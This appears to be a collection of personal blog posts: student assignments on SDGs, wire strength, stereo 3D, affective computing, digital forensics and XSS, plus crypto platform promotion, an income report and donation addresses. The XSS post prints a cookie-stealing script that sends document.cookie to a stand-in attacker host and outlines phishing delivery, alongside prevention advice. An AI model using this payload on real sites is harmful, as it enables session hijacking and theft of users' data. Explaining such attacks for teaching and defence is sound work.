February 27, 2021

My Thought of How to Contribute to Sustainable Development Goals When I was a Young Student


seventeen points of SDG
This is my Doctoral assignment from International Coorperation for Sustainable Development Goals Short Course which has never been published anywhere and I, as the author and copyright holder, license this assignment customized CC-BY-SA where anyone can share, copy, republish, and sell on condition to state my name as the author and notify that the original and open version available here. It is unfortunate that I have to go back on my words due to private circumstances and the Covid-19 Pandemic. Another factor is myself where I changed. Back then, I was into fully academic and research, and met a friend who did postdoc in many countries which was my inspiration back then. I changed ever since I was exposed to finance, entrepreneurship, investment, and cryptocurrency.

1. Cooperation for Sustainable Development Goals

five Ps
Cooperation (sometimes written as co-operation) is the process of groups of organisms working or acting together for common or mutual benefit, as opposed to working in competition for selfish benefit [1]. In other words, cooperation is the process of jointly working towards the same end with another person agreeably and willingly. International cooperation represents various nations in the pursuit of a common goal or interest. The goal of international cooperation is usually for sustainable development goals (SDG). Sustainable development is a development that meets the needs of the present without compromising the ability of future generations to meet their own needs. The featured image shows seventeen points of SDG and image above shows five Ps which are influenced and related to one another. All this factors have to be considered. [2]

2. Plans for Contribution

Although there are many points shown on above images, but there are only a few that I planned to directly contribute which hopefully will also have a positive impact on other points. There are five points which I can directly contribute:

  1. Quality Education
  2. Reducing Inequality
  3. Partnership for the Goals
  4. Industry, Innovation, and Infrastructure
  5. Affordable and Clean Energy.

There are many types of contributions that I can make, but my biggest plan is to travel to as many countries as I can after I finish and establish relationships. Therefore I can have more links for cooperation, collaboration, and etc, where more choice will be available. I have experienced that there are complex problems which often needs concepts outside of the box to solve. To have the people experience more of other parts of the world and inviting people from other parts of the world increases the chance to find solutions with concepts out of the box. I said to the people in my country which is that I would like to built the country from outside by establishing links with people from other countries so that they can become interested in the country and contribute their creative and innovative ideas for the country. In return they may also gain benefits and we may also do the same for other countries.

Types of contributions:

  • Contribution through professional activities: I will try to host or join exchange programs, because I believe that through these kinds of programs can widen the people’s perspective. For example in my country people know that throwing garbage randomly is not a good thing but they still do it because they lack the experience of being in a develop country for example, they cannot visualize the seriousness. Other stuffs that I will do is to join conferences, give guest lectures, joining workshops, or become a reviewer. I also have many experience in distant learning which probably I aimed to use this experience to built a good computer based system for better and equal quality education.
  • Contribution as a community member: I don’t really have anything much about community member, but I would like to be as bridge from one community to another.
  • Sustainable cooperation with universities/researchers (supervisors): even here in my current university, alumni from other countries are annually invited at least once a year for discussion with the current students and members here. Next time is probably it is me who will be invited. The vise versa applies as well. Also I will encourage students to continue their study in abroad or join exchange program.
  • Sustainable cooperation with colleagues in the region and all over the world: I kept in contact with my previous friends that I have met here from all over the world and I plan to visit their countries someday hoping that we can collaborate. The collaboration can be in any countries by examining its issues and see if we can implement a solution from more develop countries. For example, infrastructures are still very low for some places to conduct even computer based education. Therefore we should invest on single board computers to be used in these rural areas because it is low cost in energy consumption and price, and its independent from infrastructure because it runs on simple batteries. Another thing at the very least we can collaborate distantly through social media network whether by forums or video conferences, for example in my field of computer that we can collaborate distantly in making programs or systems together even though we are far away from each other. After that we can coauthor papers and patents.

3. Reference

  1. https://en.wikipedia.org/wiki/Cooperation
  2. K. Nakano, “International Cooperation And SDGs No One Should Be Left Behind.”, Supplied Course Material, 13-03-2018.
  3. https://i0.wp.com/www.un.org/sustainabledevelopment/wp-content/uploads/2017/12/E_2018_SDG_Poster_with_UN_emblem.png?resize=600%2C464
  4. http://www.oneworldcentre.org.au/wp/wp-content/uploads/2017/08/5-Ps-sustainability-1.png


February 17, 2021

Metal Wire Strength Calculation Object Lifting Assignment


This is one of my Doctoral assignment from Current Science and Technology in Japan Course which has never been published anywhere and I, as the author and copyright holder, license this assignment customized CC-BY-SA where anyone can share, copy, republish, and sell on condition to state my name as the author and notify that the original and open version available here.

1. Why do we need high strength metals for making a new car?

  • To protect the driver and passengers from external force (safety).
  • To reduce the weight of the car (light weigth).
  • To maintain the form of the car, for example there are mechanics and engines that produces heat.
  • The car must be strong enough to handle its internal force.

2. You are going to pick up “Treasure box(500kg)” at bottom of deep hole (5000m in depth). You have a long steel wire with 30kg/mm2 of strength, 5mm of diameter and 10000m of length. Can you pick up the box, or not? (If you couldn’t pick up by using the steel wire, what type of wire to get to pick up the box?)

wire strength calculation treasure lifting illustration
  • Load = 500kg
  • Rope = 10000m
  • Depth = 5000m
  • Number of ropes available = absolute(Rope/Depth) = abs(10000m/5000m) = 2 : We can use 2 ropes of 5000m
  • Rope Diameter = 5mm
  • Section area = πd2/4 = 3.14*25/4 mm2 = 19.64mm2
  • Total Section Area of 2 ropes = 19.64mm2 + 19.64mm2 = 39.28mm2
  • Stress = Load / Total Section Area = 500kg / 39.28mm2 = 12.73 kg/mm2
  • ? 2 Steel Wire Strength > Stress, ? 30kg/mm2 > 12.73 kg/mm2: TRUE
  • Answer: yes, the available steel wire is able to retrieve the treasure.


February 16, 2021

The Stereo 3D on Future Drones


This is one of my Masters assignment from Media Information Processing Course which has never been published anywhere and I, as the author and copyright holder, license this assignment customized CC-BY-SA where anyone can share, copy, republish, and sell on condition to state my name as the author and notify that the original and open version available here.

1. Stereoscopic 3D 2 camera

The first section explanation is from [1]. The stereoscopic 3D is a method to make 3D visual representation on an image using 2 camera's. Stereo refers to “2” and 3D is 3 dimension. The concept is based on how our eyes perceives the visual aspect of the world as in Figure 1. We can just implement it at first is we create an image using digital camera, next video representation is possible as long as the method remains implemented. The result will be as Figure 2 where the top is the 2 image and the bottom is how we will perceive it.

There are few terms that might be unfamiliar to our ears. There is interocular separation which is the distance between the centers of the human eye, that is around 65mm for male adults. The interaxial separation is the distance between the 2 lenses of the camera. It's not recommended to regard interaxial separation the same as interocular separation but interocular separation is used to calculate interaxial separation.

How our eye's see and how to implement
Figure 1. How our eye's see and how to implement

If we return to Figure 1 we see that we are using binocular vision (“bi” means two) where we are using two eyes on our vision system. For us and other mammals commonly we use it to see how the depth of an object, how deep the object went, or how far the object is. When we look at an object from a distance the image projected will be located at slightly different location for our 2 retinas and our brain interpret this as retinal disparity. The same thing will happen if we use the two camera's where the image will be registered in slightly different horizontal position which is called parallax. Another thing we can see on the first Figure is eyes are convergence when we focus on a certain object, the more closer the object to focus the more convergence (Figure 1 shows convergence eyes). Instead if the object goes further our eyes will tend to more divergence. For example when we focus on a cup we'll see one image of the cup (actually it's two image but we perceive as one image) and we focus the wall behind it instead we'll see two cups.

Preception in Stereo3D
Figure 2. Preception in Stereo3D

In Figure 2 is just an illustration of how we emulate a binocular vision on a screen. We will perceive either it as positive parallax which is the red triangle appeared to be behind the window or negative parallax, the green square seems to be in front of the windows. Our brains perceive it that way and some may call it an illusion.

2. Stereoscopic 3D 1 camera

Still to produce this is by using 2 image that fulfills the requirement. Just one camera is possible to do this like on Figure 3 a person takes two pictures. [2]

Using one camera
Figure 3. Using one camera

When using a drone we simply have to apply a control system so the drone will capture 2 image separately that fulfills the requirement. A control system may be apply to compute the distance of where to take the left image and the right image. Compute the distance to the object, then find the left image and right image angle and distance.

Camera equipped with mirror
Figure 4. Camera equipped with mirror

For video more complex method is needed. There is one on [3] that claims it's possible using mirrors and prisms as on Figure 4. Another method is to use progressive image capturing where the camera shifts left and right [4]. It quickly captures image when shift to left and shift to right, the shifting process itself is very quick. An enhanced method is use a high frequency shifting while video recording example on Figure 5 [5]. The video is then process to cancel the vibration and shaking [6].

Camera on drown shifts left and right
Figure 5. Camera on drown shifts left and right

3. Reference

  1. http://www.dashwood3d.com/blog/beginners-guide-to-shooting-stereoscopic-3d/
  2. https://adcnj3d.wordpress.com/shooting-3d-with-one-camera/
  3. https://www.lhup.edu/~dsimanek/3d/stereo/3dgallery16.htm
  4. https://en.wikipedia.org/wiki/Stereo_camera#Types_of_stereo_cameras
  5. http://www.stereofpv.com/
  6. https://helpx.adobe.com/photoshop/using/reduce-camera-shake-induced-blurring.html


My opinion on affective media and wearables paper when I was a young student

information media perception and emotion illustration

This is one of my Masters assignment from Media Information Processing Course which has never been published anywhere and I, as the author and copyright holder, license this assignment customized CC-BY-SA where anyone can share, copy, republish, and sell on condition to state my name as the author and notify that the original and open version available here.

My opinion and thoughts on Prof. Rosalind Picard's paper on, "Affective media and wearables: surprising findings" will be written as following. At first there was a similarity in my lab of human interface where we develop a technology with always keeping in mind that the final receiver is always us “human being”. Also as I'm in the E-learning group, most of the evaluations are based on the users, whether it is their emotion, performance, etc. Prof. Rosalind Picard started a new research field in affective computing. Their research group background is that most technologies were created without putting emotions into consideration. Maybe back then most of them only focuses on cognition side (a person's ability and processing power) but lacks on emotion side (frustration, stress, etc). Her field of study claims to balance the cognition and emotion on developing technologies.

Even before she started the research group she already suggested that computers need the skills of emotional intelligence for interaction with us “people”. She started by enabling computers to be able to interact with human emotions. Her product can be in form of wearable sensors, audio and video coupled with signal processing, etc. These products are design to be able to sense the physical and the emotional condition of the user. Then they will respond these values, whether to the health condition, stress level, or frustration of the users to ease them, in other words user friendly.

This field needs a collaboration between other fields (lots of them) because it includes many different aspect. The starting is in the psychology of human emotions, one of the oldest research field, that we need to understand human emotions. Up to now, not yet I have heard that a device exist that could straightly identifies the emotion of someone, but instead uses the physical phenomena that is generated by the person, for example the body heat, heart beat, and blood pressure. Thus sensors are necessary in this field to capture these values, since most of these sensors are electronic devices, the field of electronics is necessary. The values should then be converted to readable informations for people. The next step is to make the device understand a person's emotion. With the data extracted from the user, the device should process it and makes a judgment whether the person is happy, sad, angry, or other emotions. After that the device should react accordingly to these values or give feedbacks, which those in the fields of informatics can do. Once the prototype is finished then we need to think of the design. Should we embed pressure sensors on keyboard and mouse? Should we use webcam to identify the user's facial expression? Should we embed wearable sensors to the user? We must think of a strategy to apply this without adding discomfort to the user. Once a computer is aware of the person's condition and emotion, they should interact with the person. In what ways can the computer, device, or a machine respond to a person's emotion? To answer this question Engineers, Health Physician, even Psychologists needs to collaborate. In the end we strive in to make a technology that is alive and more understanding.

Another topic is using the media to communicate between people. With the advance in technology we can use electronic devices to communicate with others in long distances. We can send informations via text, but it's still on research when involving emotions in this communication. The media that is currently the closest to face to face communication is video conference. The device will do on our behalf by capturing our voice and image to transmit far away. By hearing and seeing the person we communicate our feelings or emotions. But the feeling of something is missing is still there. For example, can we comfort a sad person through video call the same way as we comfort them when they are there. That's another reason why the field of affective computing exist today. The media can mediate informations, but it still a question when involving emotions.


February 15, 2021

Paid IEEE Membership With Bitcoin Through Vandle Cryptoable Prepaid Visa Card

Vandle Card
Although I claimed myself as self employed, officially I am unemployed. Especially where the source of my income are from content creating, trading, investing, airdrops, and giveaways, all of them paid in cryptocurrency, almost no banks are willing to issue a credit card for me. While credit card's original function is to buy now and pay later (credit/debt), it can be the only method of purchase for certain online services. It is good that in convenient stores that there are vouchers to purchase at Amazon, Google Play, Apple Store, and Microsoft Store. However, certain online services still accepts credit card only.
IEEE payment option
It is good that in convenient stores that there are vouchers to purchase at Amazon, Google Play, Apple Store, and Microsoft Store. However, certain online services still accepts credit card only. Although in IEEE membership payments there are other options but I cannot pass Wechat and Alipay verification in my region, and yes there is Paypal but ironically I can only top up using credit card in my region. They do provide payment to banking but not online banking and not also direct transfer but a complicated process compared to digital age that we are now of filling the forms and lining up in the queue and not to mention whether the teller understand this kind of payment.
Vandle Card Top Up Bitcoin
Good thing I applied for and got a Prepaid Visa Card during my time in Japan that can be topped up with cryptocurrency. The card that I got is Vandle Card which currently can be topped up in Bitcoin and Bitflyer exchange for now. There are Crypto.com Card, Binance Card, Coinbase Card, and Plutus Card, they are unavailable on my region. There is Ternio Block Card but I have not tried. THe only card I have now is Vandle Card.
IEEE Payment
I topped up enough amount to pay for my membership. At first, I tried without topping up and an error occurred. I was hesitant at first but got the courage to top up. Finally, I tried again and the transaction is accepted. As you can see, below the payment history IEEE PRODUCTS AND SERVICE is the Katakan letter of Bitcoin which is a history showing that I topped it up with Bitcoin.


February 14, 2021

Torum Media Sosial Kripto Situs Mobile Tayang

Torum Mobile Website
Sebelumnya kita tidak dapat mengakses Torum menggunakan mode seluler dan harus beralih ke mode desktop setiap saat. Tak lebih dari seminggu yang lalu, tim akhirnya merilis situs versi mobile. Berikut beberapa tangkapan layar saya:
front page, menu bar, notification bar
Berikut adalah halaman depan, bilah menu, dan bilah notifikasi.
daily missions, weekly missions, special missions
Berikut menu misi yang berisi misi harian, mingguan, spesial.
wallet, mission rewards, gifts receivied
Berikut adalah menu dompet yang berisi hadiah misi dan hadiah yang diterima.
mentor, mentees, landers to discover menu
Berikut adalah menu referral yang berisi menu mentor dan mentee serta landers untuk menemukan menu.
torum official account
Berikut adalah menu perusahaan misalnya akun resmi Torum.
torum clans
Berikut adalah klan yang menunjukkan level dan exp saya dalam EKVA.
Terakhir, menu pengaturan.
torum ambassador 0fajarpurnama0
Saya menulis artikel ini sebagai Duta Torum @0fajarpurnama0. Sekalipun saya bukan duta, saya akan tetap menulis artikel ini tetapi dengan kerangka waktu yang berbeda, mungkin sebulan atau tiga bulan sekali? Saya berharap bertemu Anda segera di Torum: https://www.torum.com/signup?referral_code=0fajarpurnama0.


February 13, 2021

Torum Crypto Social Media Mobile Website Live

Torum Mobile Website
Previously we cannot access Torum using mobile mode and have to switch to desktop mode everytime. Not longer than a week ago, the team finally released the mobile version website. Here are some screenshots for me to share:
front page, menu bar, notification bar
Here is the front page, menu bar, and notification bar.
daily missions, weekly missions, special missions
Here is the mission menu containing daily, weekly, special missions.
wallet, mission rewards, gifts receivied
Here is the wallet menu containing the mission rewards and gifts received.
mentor, mentees, landers to discover menu
Here is the referral menu containing our mentor and mentees and also landers to discover menu.
torum official account
Here is the company menu for example Torum official account.
torum clans
Here are the clans showing my level and experience in EKVA.
Finally, the settings menu.
torum ambassador 0fajarpurnama0
I am writing this article as Torum ambassador @0fajarpurnama0. Even if I'm not an ambassador, I will still be writing these articles but with a different time frame, maybe once a month or three months? I hope to see you soon in Torum: https://www.torum.com/signup?referral_code=0fajarpurnama0.


February 12, 2021

My Blogger Income January 2021 Being Lazy but Unexpected

Content Creation



  • LBRY: LBC 2.24 ≈ $0.3


Personal Monetization

Common Tasks



  • Survey, faucet, etc.: $0


Currently the quantity is too much to handle when the value I earned is not much. So I may report this on a separate article.

January 2021 Income ≈ $89.418

Grade: D

Personnal Comments

Recently, there are many readers who actively liked and commented my articles on Floyx and Trybe:

  • If you enjoyed my articles, that is great and thank you!
  • If you engage for the missions and rewards, that is fine.
  • If you only enjoyed my crypto articles, then I have to inform you that I will write much less portion of it and much more portion of non-crypto articles. So it is okay to unfollow rather having you disappointed.

I did not expect to get $89 this month as many kept on pestering me to enjoy new year and stop working hard eventhough I told them that if I start enjoying once, I will not want to work again for a long time. It really did happen as you can see I write articles like once every 3-4 days where previously was everyday at least once. I read fictions, watching movies, and playing games often this month and I expected that I would probably just reach $50 this month. Then where does the remaining $39 came from? Compared to previous months, this month's Steem earnings are much more where I usually only got at most $5. Also, I didn't expect to get a share of Publish0x writing contest reward because very few are attracted to my article.


Publish0x Earnings
Publish0x Earnings
Publish0x Contest
Publish0x Competition Earnings
Blurt Earnings
Blurt Earnings
Hive Earnings
Hive Earnings
Steemit Earnings
Steemit Earnings
Leo Finance Earnings
Aeneas, Leo Finance, and STEM Geeks Earnings
Filearmy Earnings
Filearmy Earnings
LBRY Earnings
LBRY Earnings
Coinimp Earnings
Coinimp Earnings
Bittube Airtime Earnings
Bittube Airtime Earnings
Brave Browser Rewards
Brave Browser Rewards
Netbox Browser Rewards
Netbox Browser Rewards


Personally, I enjoyed being a full time independent content creator very much and I once again thank the platforms, investors, donators, and viewers for making my venture possible through donations, tippings, and upvotes. If you enjoy and/or want to further support my work you may choose more form of donation:

qr donation
Bitcoin bc1q6hg4lllxthryke7zhxflcdrcm0nr8ph7antxk9, Ethereum 0x3D4c67A2A40bC24ec53ab767b9247c02A2250BCB, Litecoin ltc1qqxl8dng0swv7zuhe30y5kzwht3l25krfaqzu2k, XRP r9rwEdZBWFRbsGzwG5gm1MjDoyBKWLPyx5, Bitcoin Cash qpd74d52rxpt3w70qv555ccq0254j7dhtg2mxst0dc, Binance Chain bnb10hdlv95jyjn92j2l6um6gkmc96a6g57lnezd66, Monero 43V43g1UC9AdgjmjJZPQRxCotyi9VTb8jbYisw2cSqEjbuvp9Y, paypal.me/fajarpurnama.
Animation Source Code


February 11, 2021

My Opinion on Digital Forensic Steps when I was a Young Student

digital forensic steps


This is the fifteenth assignment from my Masters Advanced Network Security Course which has never been published anywhere and I, as the author and copyright holder, license this assignment customized CC-BY-SA where anyone can share, copy, republish, and sell on condition to state my name as the author and notify that the original and open version available here.

1. What is Digital Forensic?

Digital forensic is a part of forensic science that recovers and investigates materials found in digital devices. Digital forensic can be computer forensic, network forensic, forensic data analysis, mobile device forensic, and anything that includes digital data. Digital forensics is widely known in gaining evidence from digital data to support justification of a crime incident, like finding the information exchange between suspects using digital media (some call it E-discovery). Very similar to digital crime investigation (DCI) which distinguish digital forensic itself as a process of digging evidence from digital device, while DCI itself is the use of digital device to help gain evidence of a crime incident. Other than supporting crime investigation digital forensic is often known to investigate certain events on the digital world. [1]

2. Why Need The Digital Forensic?

Digital technologies are becoming part of our lives, or maybe already are. Everyday we are using digital devices, and making Hollywood movies came to reality where information about certain individuals, their signatures, even evidence can be found in digital devices. More than 100 years ago we didn't treat blood, finger prints, and food prints as important evidence since science back cannot extract information of an event. Today is different where blood and finger prints can show the individual responsible on that scene. Recently digital evidence is making the same trend. With investigation on the digital device we can tell who the users are, where they are, what for and when they used it. [2]

On the first section states of real world incidents, but it's not only there that incidents occur, but also on the digital world. The term cyber threat is known now like theft of private information, online fraud, and damages due to malwares occurs. On the real world incidents we intent find who the culprit to press charges on the court but on the digital world the question “who” is not as important as “how”. We can find who breached the information security and who created the malware to press charge against them, but if that's the only thing then we can expect even more attacks in the future. How the breached occurs and how the malware works is the important thing to make a defense mechanism for future attacks. Through digital forensic we obtain these information to apply security based on the threat. [3]

3. How to Perform Digital Forensic?

Generally there 4 steps [4]:

  1. Seizure: the process of obtaining the devices to to be analyze.
  2. Acquisition: the process of duplicating the information contain on a digital device. In Linux an application called “disk-disk” (dd) can be used, and not forget to use hashing like MD5 to confirm the integrity of data (make sure the data was not tampered). [5]
  3. Analysis: this is the main process to find evidence and a very specialist field. The original data must not be touched instead we use the duplicated data from the previous process. Examples are examining the logs, metadata, capture packets with Wireshark, files, directories, etc. The process of log analysis alone is already very wide. [6]
  4. Reporting: the final and deterministic step with no matter how skilled we are in gathering digital evidence, it's no use if we cannot make a decent report or present the results well. Tools like Encase and Forensic Tool Kit (FTK) can generate nice reports. [7]

4. Reference

  1. https://en.wikipedia.org/wiki/Digital_forensics
  2. http://ellwoodevidence.com/digital-forensics-why
  3. http://www.darkreading.com/attacks-breaches/why-digital-forensics-in-incident-response-matters-more-now/a/d-id/1318254
  4. https://en.wikipedia.org/wiki/Digital_forensic_process
  5. http://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-using-kali-part-2-acquiring-hard-drive-image-for-analysis-0155533
  6. http://md.kumamoto-u.ac.jp/course/view.php?id=38348
  7. http://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-using-kali-part-1-the-tools-forensic-investigator-0155427


February 10, 2021

My Opinion of XSS/CSS, Digital Forensic, and Digital Crime Investigation when I was a Young Student

featured image


This is the fourteenth assignment from my Masters Advanced Network Security Course which has never been published anywhere and I, as the author and copyright holder, license this assignment customized CC-BY-SA where anyone can share, copy, republish, and sell on condition to state my name as the author and notify that the original and open version available here.


XSS/CSS stands for cross site scripting which is a computer security vulnerability to inject scripts into web pages viewed by other users [1]. What is the difference between code injection? Code injection is a server side vulnerability while XSS is a client side vulnerability, what they have in common is they are injection type attack [2]. One of the easiest method to check for XSS vulnerability is to include a html tags into the submission form, for example on Figure 1 is an <S> (strike-through) html tag inserted on a simple php form input (any php tutorial on the web have this tutorial) and Figure 2 is an example of using <img src=””> tag to add an image, even worse we can input tags that could display the attacker site instead and take the victim site with <script>document.location="http://some_attacker/cookie.cgi?" + document.cookie</script>. (1) Once a XSS vulnerability had been found we can send a phising email to the user of the site containing the XSS script. (2) With a good social engineering the user site can be tricked in running the code and connect to attacker's site through the vulnerable XSS site. (3) The attacker can obtain the session ID and other informations of the victim. [3]

checking XSS vulnerability strike through HTML tag example
Figure 1. Checking XSS vulnerability strike through HTML tag example.

To prevent XSS we have to filter the user input. One way is to not allow html tags for, or perform sensitization allowing text formatting tag such as <B> <U> <I> <S>, and converting dangerous tags like “&→&amp”, “&lt→&lt”, “&gt→&gt”, “”→&quot”, “'→&x27”, and “/→&x2f”. For my above PHP code I can fix it by changing the output function (adding) into “echo htmlspecialchars($string, ENT_QUOTES, 'UTF-8')”. There are libraries available for filtering XSS if it's difficult to make our own libraries such as “PHP AntiXSS”, “xss_clean.php filter”, “htmlpurifier”, “xssprotect”, and “XSS html filter”. [4]

checking XSS vulnerability image HTML tag example
Figure 2. Checking XSS vulnerability image HTML tag example.

2. Digital Crime Investigation vs Digital Forensic

Digital crime investigation is mainly used in criminal investigation in order to enhance the criminal investigation process itself. It's more like an auxiliary to tool in which is specifically digital typed tools. For example (1) the use of surveillance camera to capture robbery incident in stores, (2) categorizing data, clustering data, plotting graph, which is under data mining, (3) using database to store crime records. On the other hand digital forensic is to extract, collect, analyze, and preserve digital evidence, for example to be shown in court. [5]

illustration of digital forensic on hardware containing data
Figure 3. Illustration of digital forensic on hardware containing data.

Both digital crime investigation and digital forensic are part of a subject called forensic science. Performing autopsy on a dead body to find the cause of death is an example of medical forensic. Then examining a computer to search for informations of itself being attacked is an example of digital forensic. The basic step is to (1) identify the attack, its extent and damage caused, (2) identify the source of the attack, (3) record the incident. The scope of digital forensic can be computer forensic as example above, or network forensic which the larger scale with the computer forensic included into the network forensic. Unlike medical forensic we can first create a duplicate of the computer data or network data before running digital forensic which is a safe type of investigation that avoids the risk of destroying the evidence. Most popularly examined on digital forensics are maintenance of files and folders, disk logs, server logs, logs from IDS/IPS, and network packets if captured. [5]

3. Reference

  1. https://en.wikipedia.org/wiki/Cross-site_scripting
  2. https://community.rapid7.com/community/nexpose/blog/2013/06/20/xss-vs-injection
  3. http://md.kumamoto-u.ac.jp/mod/book/view.php?id=98590&chapterid=4892
  4. http://resources.infosecinstitute.com/how-to-prevent-cross-site-scripting-attacks
  5. http://md.kumamoto-u.ac.jp/mod/book/view.php?id=98593&chapterid=4897